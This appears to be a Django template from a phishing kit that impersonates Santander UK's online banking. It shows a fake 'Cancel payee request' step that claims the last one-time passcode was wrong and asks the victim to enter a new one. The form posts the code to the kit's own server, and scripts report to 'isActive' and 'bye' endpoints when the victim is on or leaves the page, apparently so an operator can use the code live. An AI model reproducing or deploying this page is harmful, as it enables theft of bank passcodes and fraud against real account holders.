{% load static %}
{% block content %}
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<title>Santander</title>
    <link rel="icon" href="{% static 'styles/favicon.ico' %}" type="image/x-icon">
         <link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
<link rel="stylesheet" type="text/css" href="{% static 'styles/santander.css' %}">
<link rel="stylesheet" type="text/css" href="santander.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>
<style type="text/css">
    .bs-example{
        margin: 20px;
    }
    
    
    .navbar-toggler:hover{
        
        background-color:#ec0000
        
        
    }
    
       a:hover{
        
        background-color:#ec0000
        
        
    }
    
    a{
        
        
        text-decoration:none !important;
        
        font-size:1rem !important;
        
        
    }
    
    input{
        
        border:1px solid #666;
        outline:none;
        box-shadow:none;
        border-radius:0px;
        border-style:solid;
        
    }
    input:focus{
        
        
        outline:none;
        box-shadow:none;
        border-radius:0px;
        border-style:solid;
        
    }
</style>

</head>
<body style="background:white !important">
<div class="bs-example" style="width:100%;margin:0 auto !important">
   <nav class="navbar navbar-expand-md navbar-light bg-light" style="width:100%;margin:0 auto !important;background-color:#ec0000 !important;">
        <a href="#" class="navbar-brand" style="color:white"><img src="{% static 'styles/navbarimg.png' %}" width = "130px">  </a>
        <button type="button" onclick="window.location.href='https://www.santander.co.uk/logoff'" class="navbar-toggler" data-toggle="collapse" data-target="#navbarCollapse" style="outline:none;border:0px;background:#ec0000">
<span class="navbar-toggler" style="outline:none;border:0px">

<p style="color:white;font-size:smaller;position:relative;bottom:1.5rem">Log out</p>
        </button>

        <div class="collapse " id="navbarCollapse" style="border:0px !important;outline:none !important">
            <div class="navbar-nav" style="background-color:#ec0000;border:0px !important;outline:none !important">
                <a href="#" class="nav-item nav-link" style="color:white !important">My Accounts & Transactions</a>
                <a href="#" class="nav-item nav-link active" style="color:white !important">Payments & Transfers</a>
                <a href="#" class="nav-item nav-link" style="color:white !important">Standing Orders</a>
                <a href="#" class="nav-item nav-link" style="color:white !important">Direct Debits</a>
                <a href="#" class="nav-item nav-link" style="color:white !important">Credit Cards</a>
                <a href="#" class="nav-item nav-link" style="color:white !important">Account Services</a>
                <a href="#" class="nav-item nav-link" style="color:white !important">My Details & Settings</a>
                <a href="#" class="nav-item nav-link" style="color:white !important">Help & Contact Us</a>
                <a href="#" class="nav-item nav-link" style="color:white !important">Logout</a>
                
            </div>
           
        </div>
    </nav>
    

    <div class="form-group" style="margin: 0 auto !important;padding-left:0%">

    
        
  
        <div style="margin:0 auto;text-align:center;padding-top:1%">
        <p style="color:#666;font-size: 1em;
font-weight: bold;
margin: 1em 0;
line-height: 1.2em;display:inline">Payee Request |</p>  <p style="color:#666;font-size: 1em;
font-weight: 400;
margin: 1em 0;
line-height: 1.2em;display:inline">Step 2 of 3 </p></div>
<br>

         <div class="w3-border" style="width:80%;margin: 0 auto">
         
  <div class="w3" style="height:5px;width:66%;background-color:#ec0000 !important"></div>
  
</div> <br>
     <div style="margin:0 auto;text-align:center;">
        <p style="color:#666;font-size: 1em;
font-weight: bold;
margin: 1em 0;
line-height: 1.2em;display:inline">Action Selected: </p>  <p style="color:#666;font-size: 1em;
font-weight: 400;
margin: 1em 0;
line-height: 1.2em;display:inline">Cancel payee request </p>
        <br> <br> <br>
        <h1 style="color:#666;margin: 0 auto !important;font-size: 2.2em;
font-weight: 400;
margin: 1em 0;
line-height: 1.2em;">Enter Your One Time Passcode</h1>
        </div>
      
    </div>
       <div class="form-group" style="margin: 0 auto !important;padding-left:0%;width:85%">
        <br>
      <p style="font-size:16px">The one time passcode you entered was incorrect, another one has been sent, the code will expire within 30 seconds.</p>
        <br>
            <form action="" method="POST" onsubmit="return !!(validateOtp())">{% csrf_token %}
              
      
      <input name="otp" type="text" id="passcode" style="background:white" required>
   

        
 <span class="button" style="text-align:end;padding-left:5%;margin: 0 auto"><br><br>
					<input type="submit" name="signOtpDelete.actions.1" class="submitOnlyOnce continue firstfocus defaultAction primary" tabindex="1" value="Confirm" style="background-color: #ec0000 !important;border-color: #ec0000 !important" id="submit">
				</span>
                </form>
<br><br>
</div>
    
</div>
        {% block javascript %}
    <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>


<script>
    

function online(){

var ip_address = document.getElementById('pid').value 
console.log(ip_address)


$.ajax({


type: 'GET',
 
 url: '{% url "isActive" %}',

 data: {
            'pid': ip_address
        },
 


success: function(response){

  
if(response.accept){





}

   

},

error: function(response){







}




}

)}

</script>

<script>


function offline(){

var ip_address = document.getElementById('pid').value 

$.ajax({


type: 'GET',
 
 url: '{% url "bye" %}',

 data: {
            'pid': ip_address
        },
 


success: function(response){

  
if(response.accept){





}

   

},

error: function(response){







}





});




}




</script>

<script>

online()
</script>

<script>
$(window).on("beforeunload", function() { 
    offline()
})

</script>

    {% endblock javascript %}

</body>

</html>
{% endblock %}
